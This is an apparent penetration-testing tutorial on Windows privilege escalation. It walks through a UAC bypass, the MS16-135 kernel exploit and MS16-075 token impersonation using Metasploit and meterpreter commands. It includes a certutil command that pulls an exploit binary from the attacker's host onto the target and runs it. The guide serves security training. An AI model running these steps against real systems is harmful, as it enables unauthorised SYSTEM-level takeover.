in , , ,

Windows Privilege Escalation Fundamentals

Windows Privilege Escalation Techniques For Beginners

Prerequisites & Requirements

to follow along with the tools and techniques utilized in this document, you will need to use one of the following offensive Linux distributions:

  • Kali Linux
  • Parrot OS

The privilege escalation techniques used in this book were tested in the following versions of Windows:

  1. Windows 7
  2. Windows 10

The following is a list of recommended technical prerequisites that you will need  to get the most out of this course:

  • Familiarity with Linux system administration.
  • Familiarity with Windows.
  • Functional knowledge of TCP/IP.
  • Familiarity with penetration testing concepts and life-cycle.

Note: The techniques and tools utilized in this document were performed on Kali Linux 2021.2 Virtual Machine 

MITRE ATT&CK Privilege Escalation Techniques

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:

  • SYSTEM/root level
  • local administrator
  • A user account with admin-like access
  • user accounts with access to a specific system or performs a specific function

The following is a list of key techniques and sub-techniques that we will be exploring:

  1. UAC Bypass
  2. Token Impersonation
  3. Kernel Exploits

Scenario

Our objective is to elevate our privileges on Windows target systems by leveraging various privilege escalation techniques.

 

Note: The techniques used in this document were performed through a meterpreter session, primarily because Empire does not provide users with the ability to transfer exploit code or binaries or perform manual tests.

 

Privilege Escalation Techniques We Will BeUtilizing

  1. Bypassing UAC – Adversaries may bypass UAC mechanisms to elevate process privileges on the system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. 
  2. Kernel Exploits – Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. The exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or the kernel itself to execute adversary-controlled code.
  3. Token Impersonation – Adversaries may duplicate and then impersonate another user’s token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged-on user’s security context.

Bypassing UAC

We can bypass UAC mechanisms to elevate process privileges on the target system. The Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. 

Metasploit has various UAC privilege escalation modules that we can utilize to elevate our privileges. 

The following procedures outline the process of elevating privileges by bypassing UAC on a Windows 10 system:

meterpreter> background

We can now search for UAC modules by running the following command:

msf> search bypassuac

As highlighted in the following screenshot, we will be utilizing the “bypassuac_injection_winsxs” module as it is the only module that works on Windows 10 systems.

We can now load the bypass UAC module by running the following command:

msf> use module exploit/windows/local/bypassuac_injection_winsxs

After loading the module, we will need to configure the module options, this can be done by running the following commands:

msf> set payload windows/x64/meterpreter/reverse_tcp
msf> set target WIndows x64
msf> set SESSION <SESSION-ID>

After configuring the module options, we can now execute the module by running the following command:

msf> run

If successful, the module will send the meterpreter stage to the target and you should receive an elevated meterpreter session as shown in the following screenshot.

We can confirm that we have an elevated session by listing out the Windows privileges for our current user, this can be done by running the following command in meterpreter:

meterpreter> getprivs

As shown in the preceding screenshot, this meterpreter session has administrative privileges and we can migrate to an NT AUTHORITY/SYSTEM process.

Windows Kernel Exploits

We can exploit vulnerabilities in the Windows NT kernel in an attempt to elevate our privileges. The exploitation of a vulnerability in the Windows kernel occurs when an adversary takes advantage of a programming error in the kernel to execute adversary-controlled code.

We can begin the kernel exploitation process by taking a look at how to identify and transfer kernel exploits onto our target system. For this section, our target system will be running Windows 7. As a prerequisite, ensure that you have gained your initial foothold on the system and have a meterpreter session:

The first step is to scan and identify potential kernel vulnerabilities. This can be done through the use of the Windows-Exploit-Suggester tool.

The Windows-Exploit-Suggester script can be downloaded from this link: https://github.com/AonCyberLabs/Windows-Exploit-Suggester

In order to use the Windows-Exploit-Suggester tool, you will need to run the following commands:

./windows-exploit-suggester.py --update

The preceding command will download the vulnerability database and save it as a .xlsx file. We will be utilizing this vulnerability database to identify vulnerabilities on the target system.

The next step will involve enumerating the target operating system information and configuration, this can be done by running the following command in a Windows command shell:

systeminfo

We will need to copy this information and paste it into a file called “systeminfo.txt”. We will be using this file to identify Kernel exploits with the Windows-Exploit-Suggester.

We can now utilize the Windows-Exploit-Suggester to identify vulnerabilities for our target system, this can be done by running the following command on Kali:

./windows-exploit-suggester.py --database <DATABASE.XLSX> --systeminfo <SYSTEMINFO.TXT>

As shown in the following screenshot, Windows-Exploit-Suggester will display a list of vulnerabilities that we can exploit on the target system in order to elevate our privileges.

It is always recommended to use the first exploit recommended by the Windows-Exploit-Suggester. In this case, we will start off with the MS16-135 kernel exploit. We will need to determine more information about the exploit and how it should be used. This can be done  by performing a quick Google search as highlighted in the following screenshot:

The Google search reveals a GitHub repository that contains information regarding the exploit, the exploit source code, and how it should be used.

It is always recommended to analyze the source code to ensure that it is not malicious and works as intended to make any additional modifications required. In this case, we will be using the prebuilt exploit as shown in the following screenshot.

After downloading the pre-built exploit executable, we will need to transfer it over to the target system.

We can now transfer the exploit executable to the target system, this can be done by starting a local web server on the Kali VM with the SimpleHTTPServer Python module:

sudo python -m SimpleHTTPServer 80

In order to transfer the exploit executable onto the target system, we can utilize the certutil utility. This can be done by running the following command on the target system:

C:\Temp> certutil -urlcache -f http://<KALI-IP>/41015.exe exploit.exe

We can now run the exploit executable by running the following command on the target system:

C:\Temp> .\exploit.exe

As highlighted in the following screenshot, the exploit executable requires the user to specify the target operating system, in our case the target operating system is Windows 7, as a result, we can execute the exploit by running the following command:

C:\Temp> .\exploit.exe 7

After running the exploit with the operating system specified, it will take a few seconds to complete, after which we should have an elevated shell with NT AUTHORITY/SYSTEM privileges as shown in the following screenshot.

Token Impersonation 

Adversaries may duplicate and then impersonate another user’s token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged-on user’s security context.

In this section, we will be exploring the process of performing a token impersonation attack.

For this section, our target system will be running Windows 7. As a prerequisite, ensure that you have gained your initial foothold on the system and have a meterpreter session

We can begin the process by following the outlined procedures:

The first step will involve identifying any potential vulnerabilities that can be exploited through the Potato attack. This can be done through the use of the Windows Exploit Suggester script:

./windows-exploit-suggester.py --database <DATABASE.XLSX> --systeminfo <SYSTEMINFO.TXT>

As highlighted in the following screenshot, we are able to identify a token impersonation vulnerability.

Researching the MS16-075 vulnerability reveals a Metasploit module that can automate the token impersonation attack.

We can load the module in Metasploit by running the following command:

msf> use exploit/windows/local/ms16_075_reflection

After loading the module, you will need to configure the module options, this can be done by running the following commands:

msf> set payload /windows/x64/meterpreter/reverse_tcp
msf> set SESSION <SESSION-ID>

We can now run the module by running the following command:

msf> run

The next step involves performing the impersonation process and can be performed by loading the incognito module on meterpreter. This can be done by running the following command:

meterpreter> load incognito

We can now use incognito to list the available tokens available for impersonation, this can be done by running the following command:

meterpreter> list_tokens -u

As shown in the following screenshot, we are able to identify the “NT AUTHORITY\SYSTEM” token.

We can impersonate the “NT AUTHORITY\SYSTEM” token by running the following command:

meterpreter> impersonate_token “NT AUTHORITY\SYSTEM”

We can now verify that we have elevated our privileges by running the following command in meterpreter:

meterpreter> getuid

As shown in the following screenshot, we have been able to successfully elevate our privileges.

Windows Red Team Defense Evasion Techniques